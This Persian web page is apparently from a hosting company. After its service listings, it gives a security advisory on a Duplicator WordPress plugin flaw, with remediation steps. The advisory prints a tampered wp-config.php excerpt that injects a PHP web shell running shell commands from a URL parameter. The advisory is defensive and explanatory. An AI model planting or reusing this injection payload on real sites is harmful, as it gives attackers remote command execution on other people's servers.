• میزبانی وب
    •  لینوکس
      استفاده از سرویس های هاست لینوکس به تمامی کاربرانی که امنیت و آپتایم بالای وب سایت، سرعت مناسب و سرویس ایمیل پایدار را انتظار دارند؛ توصیه می شود.
      مشهدهاست بهترین کیفیت و نهایت سرعت ممکن و قیمت مناسب را برای هاست های لینوکس ایران و خارج با کنترل پنل های CPanel و DirectAdmin بهمراه وب سرورهای LiteSpeed و Apache بر روی سرورهایی با سیستم عامل Cloud Linux و Centos و همچنین دیسک های پر سرعت SSD و فوق پرسرعت NVMe در بهترین دیتاسنترهای ایران و اروپا ارائه می دهد. کلیه سرویس های هاست اشتراکی در مشهدهاست دارای گارانتی بازگشت وجه می باشند.

    •  ویندوز

      هاست های ویندوزی مشهدهاست برای سایت هایی که از فناوری های مایکروسافت و زبان های برنامه نویسی asp و aspx و پایگاه داده sqlserver استفاده می کنند، مناسب هستند. البته زبان برنامه نویسی php و پایگاه داده mysql نیز در سرورهای ویندوزی پشتیبانی می شوند ولی برای سایت های حرفه ای php و وردپرس و جوملا هاست های لینوکسی توصیه می شود. جهت مرتفع کردن کلیه نیازهای برنامه نویسان و مشتریان، مشهدهاست سرورهای متعدد میزبانی ویندوز دارد و روی هر گروه سرور یک نسخه از ویندوز و فناوری ها نصب شده و تمامی کامپوننت های زبان های برنامه نویسی asp,asp.net … را پشتیبانی می کند. سرورهای پیش فرض میزبانی هاست ویندوز مشهدهاست مجهز به آخرین تکنولژی های سخت افزاری و نرم افزاری بوده و از کنترل پنل قدرتمند و محبوب Plesk جهت مدیریت هاست بهره مند می باشند و سرورها در بهترین دیتاسنترهای بین المللی و داخلی میزبانی می شوند.

    •  ایمیل

      سرویس های ایمیل هاستینگ مشهدهاست به کاربران اجاره می دهد تحت دامنه خودشان و بدون نیاز به سرویس هایی مانند gmail و yahoo ایمیل اختصاصی و رسمی و منحصر داشته باشند. جدا بودن میزبانی ایمیل ها از هاست اصلی مزیت هایی دارد و به مشتریانی که استفاده حرفه ای از ایمیل دارند و برای مکاتبات اداری، بازرگانی و تجاری از ایمیل اختصاصی و رسمی استفاده می کنند توصیه می شود. توجه داشته باشید برای ایمیل مارکتینگ سرورهای اختصاصی ایمیل توصیه می شود و هاست های اشتراکی ایمیل به دلیل محدودیت ها برای این منظور مناسب نیست. سرورهای اختصاصی ایمیل به منظور ایمیل مارکتینگ می باشند و نرم افزار های معروف و حرفه ای ایمیل مارکتینگ روی آن ها نصب می شود و تنظیمات سرور نیز با هدف ایمیل مارکتینگ به صورت حرفه ای اعمال می شود و محدودیت های ایمیل هاستینگ های اشتراکی را ندارند.

    •  هاست دانلود

      هاست های دانلود مشهدهاست به منظور میزبانی فایل ها و آپلود و دانلود (Upload & download) استفاده می شوند و به دلیل اینکه روی سرویس ها فقط فایل میزبانی می شود و دیتابیس ندارند و تنظمیات اختصاصی اعمال می شود سرعت بسیار بالاتر و قیمت بسیار مناسبتری دارند و به سایت هایی که دانلود یا نمایش فایل دارند توصیه می شود در کنار سایت و هاست اصلی، هاست دانلود نیز داشته باشند. هاست های دانلود را می توان روی یک ساب دامنه از دامنه و سایت اصلی داشت و به عنوان هاست دوم و کمکی باشد و ارتباط دو هاست از طریق تعریف A record انجام خواهد شد. همچنین این نوع هاست برای بک آپ گیری و انتقال فایل های بک آپ از سایت اصلی به این هاست ها بسیار مناسب می باشد و اکیدا توصیه می شود. هاست های دانلود مشهدهاست از کدهای php یا asp نیز پشتیبانی می کنند. سرورهای میزبان هاست دانلود مشهدهاست در بهترین دیتاسنترهای بین المللی و داخلی با پورت 10 گیگ و با وب سرور پرسرعت لایت اسپید یا انجینکس یا اپاچی (بهینه شده) می باشند.

    •  نمایندگی

      سرویس های نمایندگی میزبانی برای اشخاص یا شرکت های طراحی و راه اندازی سایت و یا افرادی که مایل به کسب درآمد در زمینه فروش هاست هستند و یا وب مسترهایی که دارای تعداد زیادی سایت هستند مناسب و به صرفه می باشد. همچنین می توانند منابع را بین هاست هایشان با پلن های مورد نظرشان تقسیم کنند. در این سرویس ها کلیه امور فنی و نگهدرای سرور توسط تیم فنی مشهدهاست انجام می شود و نمایندگان با دسترسی پنل هایی که ارایه می شود می توانند نسبت به ایجاد هاست و مدیریت هاست های ایجاد شده براحتی اقدام کنند.

  • طراحی سایت
    •  مشهد دیزاین

      مشهددیزاین که عضو مجموعه مشهدهاست در قسمت طراحی می باشد با عنوان گروه یاران توس در سال ۱۳۸۲ با به کارگیری نیروهای متخصص و استفاده از تجارب اساتید دانشگاه، با هدف ارائه سرویس های میزبانی وب و خدمات نرم افزاری و گرافیکی فعالیت خود را آغاز نمود. هم اکنون با داشتن بیش از ۱۰ سال تجربه با دهها مجموعه دولتی، اتحادیه ها، انجمن های علمی دانشگاه ها وادارات و شرکت های خصوصی کشور در زمینه فن آوری اطلاعات و طراحی سایت و امور گرافیکی و تیزر های تبلیغاتی همکاری دارد.

      ما با تجربه ای کارامد در کلیه امور طراحی از مشاوره و اجرا در زمینه طراحی سایت تا برند سازی و معرفی و بالا آوردن سایت و برند شما در گوگل و معرقی آن به هزاران کاربر اینترنتی و نیز در زمینه عکاسی حرفه ای از محصولات شما و کلیه امور گرافیکی از طراحی لوگو و بروشور وکاتالوگ و بسته بندی محصولات تا ساخت تیزر های تبلیغاتی در کنار شما هستیم.

      مشاهده سایت و توضیحات بیشتر

مشکل امنیتی افزونه Duplicator وردپرس + راه حل مشکل

به تازگی مشاهده شده است که بسیاری از وب سایت هایی که از CMS وردپرس استفاده میکنند دچار اختلال و یا هک شده اند، پس از بررسی متوجه شدیم که مشکل از فایل های installer.php (افزونه Duplicator) است. افزونه Duplicator یکی از پرکاربرد ترین افزونه های وردپرس برای بک آپ گیری و انتقال سایت های وردپرسی است. این باگ باعث میشه اختلالات زیادی مثل حذف شدن مشخصات دیتابیس از فایل کانفیگ وردپرس به وجود بیاید که در این صورت سایت با پیغام دیتابیس مواجه می شود. در ادامه با ما همراه باشید تا راه حل این مشکل را بررسی کنیم :

 در زمانی که قالبی را نصب میکنید  بعد از پایان کار و استفاده از افزونه، فایل های installation باقی مانده توسط کاربر از روی هاست پاک نمی شوند. خود افزونه Duplicator این موضوع را به کرات به کاربر گوشزد می کند.
بعد از پایان کار افزونه، این پیغام به صورت sticky داشبورد نمایش داده میشه و تا زمان پاک کردن فایل های نصبی (و یا uninstall کردن افزونه) باقی می ماند:

 

فایل های مخرب اصلی در این باگ، دو فایل installer.php و installer-backup.php هستند و چون استرینگ های دریافتی را اصطلاحا بدون تمیز کاری (sanitizing)‌ مستقیما به فایل wp-config وارد می کنند باعث به وجود آمدن injection vulnerability در سایت می شوند.

 

این مشکل چگونه به وجود می آید؟


همونطور که میدانید با استفاده از افزونه Duplicator کلیه تنظیمات و اطلاعات دیتابیس، قالب وردپرس، افزونه‌های وردپرس و به طور کلی هر اطلاعاتی که در وردپرس دارید این امکان رو پیدا میکنه که یک نسخه خروجی ازش تهیه کنید. در این نسخه خروجی شما دو فایل installer.php و فایی که شامل محتویات سایت و دیتابیس هست رو خواهید داشت که با استفاده از فایل database.sql هم امکان درون ریزی داده‌های دیتابیس در سایت جدید فراهم خواهد شد.

حالا وقتی که تصمیم به نصب قالب با استفاده از بسته نصبی در سایت خودتون میگیرید، فایل‌های database.php، installer.php، installer-backup.php، installer-log.txt و installer-data.sql و پوشه wp-snapshot نیز در کنار سایر فایل‌های پیشفرض وردپرس قرار میگیرند. مشکل هک وردپرس درست از همینجا آغاز میشه که به دلیل وجود باگ در این افزونه باعث میشه که هکر بتونه امکان دو بار نصب وردپرس رو به دست بیاره که یک بار هم مشابه همین مشکل در سال گذشته رخ داد و باعث هک بسیاری از سایت‌های وردپرسی شد.

این موضوع باعث میشه که هکر در مرحله اول سایت شما را ریست بکنه و با ارسال یک سری فایل مخرب فایل wp-config.php وردپرس را ویرایش کرده و از نو بازنویسی بکنه که این مسئله اولین قدم برای از دست خارج شدن سایت هست. طی بررسی که روی چند فایل wp-config.php برخی سایت‌ها داشتیم کدهای این فایل به شکل زیر تغییر کرده بودند.

 

/** The name of the database for WordPress */
define('DB_NAME', 'test
'); file_put_contents("test.php", '<pre><?php if
(isset($_GET["synacktiv_backdoor"])) { echo shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>');
/
*
');
/** MySQL database username */
define('DB_USER', 'test');
/** MySQL database password */
define('DB_PASSWORD', 'test');
/** MySQL hostname */
define('DB_HOST', 'nowhere:12345');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

 

همونطور که میبینید اطلاعات دیتابیس به صورت کلی از بین رفته و با چیز دیگه جایگزین شده و علاوه بر این هم یک سری کد در این فایل تزریق شده که باعث شده هکر یک درب پشتی برای هک مجدد برای خودش ایجاد بکنه. بعد از این هک گسترده معمولا با دو مشکل اساسی مواجه خواهید شد.

    - وقتی با دستکتاپ وارد سایتتون بشید با خطای ۵۰۰ در وردپرس مواجه می‌شوید.
    - وقتی با موبایل وارد سایت شوید با ریدایرکت شدن از چند آدرس به آدرس دیگه در نهایت به شکلی به صفحات تبلیغ و اسپم هدایت خواهید شد.

مسئله بعدی که رخ میده اینه که علاوه بر فایل‌های پیشفرض وردپرس یک سری فایل php و web.config دیگه هم در public_html سایت شما اضافه خواهد شد. که تمامی مشکلات و هک شدن سایت به خاطر پاک نکردن فایل installer.php و عدم آپدیت این افزونه به وجود اومده.

 

راه حل

    - افزونه Duplicator را آپدیت کنید. چون patch مربوط به باگ توسط شرکت صادر شده که تا حد زیادی مشکل رو رفع می کنه.
    - فایل هایی که دربارش صحبت شد (installer.php and installer-backup.php) و یا هر فایل دیگه ای که مربوط به بازگردانی بک آپ توسط افزونه میشه را از روی هاست خود پاک کنید. ممکنه فایل هایی با اسم database.sql را هم ببینید که باید حذف بشه.
    - جهت اطمینان رمز دیتابیس وردپرس را ریست کنید.
    - باز هم جهت اطمینان، فایل wp-config.php را پاک کنید و مجددا بسازید. از این API وردپرس استفاده کنید تا کلید های امنیتی برای فایل بسازید و در آن جایگزین کنید.

دامنه

میزبانی وب

سرور

طراحی سایت

امنیت

سایر خدمات

ارتباط با ما

1
2
ورود به بخش پشتیبانی مشهدهاست